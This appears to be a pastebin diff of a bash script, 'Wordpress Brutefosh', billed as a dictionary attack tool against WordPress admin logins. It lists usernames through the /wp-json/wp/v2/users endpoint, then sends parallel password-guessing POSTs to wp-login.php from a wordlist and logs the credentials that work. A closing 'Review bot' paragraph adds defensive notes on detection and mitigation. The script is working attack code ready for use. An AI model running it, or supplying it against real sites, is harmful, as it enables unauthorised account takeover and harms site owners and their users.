View difference between Paste ID: WaQUYNW1 and z1VikwBP
1
#!/bin/bash
2
# Name       : Wordpress Brutefosh
3
# Version    : 1.2
4
# Desc.      : Dictionary Attack Tool - Wordpress Admin
5
# Coded by   : Schopath
6
# Website    : www.zerobyte.id
7
# Updated on : 2019-03-28
8
9
#----------- CONFIGURATION -----------
10
curl_timeout=20
11
multithread_limit=10
12
#--------- CONFIGURATION EOF ---------
13
14
if [[ -f wpusername.tmp ]]
15
then
16
	rm wpusername.tmp
17
fi
18
RED='\e[31m'
19
GRN='\e[32m'
20
YEL='\e[33m'
21
CLR='\e[0m'
22
23
function _GetUserWPJSON() {
24
	Target="${1}";
25
	UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
26
	echo ""
27
	if [[ -z ${UsernameLists} ]];
28
	then
29
		echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
30
	else
31
		echo -ne > wpusername.tmp
32
		for Username in ${UsernameLists};
33
		do
34
			echo "INFO: Found username \"${Username}\"..."
35
			echo "${Username}" >> wpusername.tmp
36
		done
37
	fi
38
}
39
40
function _TestLogin() {
41
	Target="${1}"
42
	Username="${2}"
43
	Password="${3}"
44
	LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
45
	if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
46
	then
47
		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
48
	elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
49
	then
50
		echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
51
		echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
52
	else
53
		echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
54
	fi
55
}
56
57
echo ' _    _               _                         '
58
echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
59
echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
60
echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
61
echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
62
echo '                       |_|.::Brutefo(sh) 2019::.'
63
echo ''
64
65
echo -ne "[?] Input website target : "
66
read Target
67
68
curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
69
if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
70
then
71
	echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
72
	exit
73
fi
74
75
echo -ne "[?] Input password lists in (file) : "
76
read PasswordLists
77
78
if [[ ! -f ${PasswordLists} ]]
79
then
80
	echo -e "${RED}ERROR: Wordlists not found!${CLR}"
81
	exit
82
fi
83
84
_GetUserWPJSON ${Target}
85
86
if [[ -f wpusername.tmp ]]
87
then
88
	for User in $(cat wpusername.tmp)
89
	do
90
		(
91
			for Pass in $(cat ${PasswordLists})
92
			do
93
				((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
94
				_TestLogin ${Target} ${User} ${Pass} &
95
			done
96
			wait
97
		)
98
	done
99
else
100
	echo -e "${YEL}INFO: Cannot find username${CLR}"
101
	echo -ne "[?] Input username manually : "
102
	read User
103
104
	if [[ -z ${PasswordLists} ]]
105
	then
106
		echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
107
		exit
108
	fi
109
	echo ''
110
	(
111
		for Pass in $(cat ${PasswordLists})
112
		do
113
			((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
114
			_TestLogin ${Target} ${User} ${Pass} &
115
		done
116
		wait
117
	)
118
fi
119
echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
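Review bot: The header block (Name/Version/Desc.) says nothing about the script's observable footprint, which is what a reader triaging this paste needs; a comment such as `# Footprint: GET <target>/wp-json/wp/v2/users, then up to multithread_limit parallel POSTs to <target>/wp-login.php (log=, pwd=, wp-submit=); writes wpusername.tmp, wplogin.tmp and wpbf-results.txt in the working directory` would cover it. None of the `curl` calls pass `-A`/`--user-agent`, so requests carry curl's default User-Agent, and a REST user listing followed by bursts of `wp-login.php` POSTs from one source is a simple pattern to alert on in web server logs. On the server side, the two things the script depends on are the ones to close down: unauthenticated access to `/wp-json/wp/v2/users`, and unthrottled attempts against `wp-login.php` (rate limiting, lockout, MFA). `_TestLogin` appears to record a hit based only on a 302 status with no `login_error` div in the response, so entries in a recovered wpbf-results.txt are candidates to verify rather than confirmed compromises.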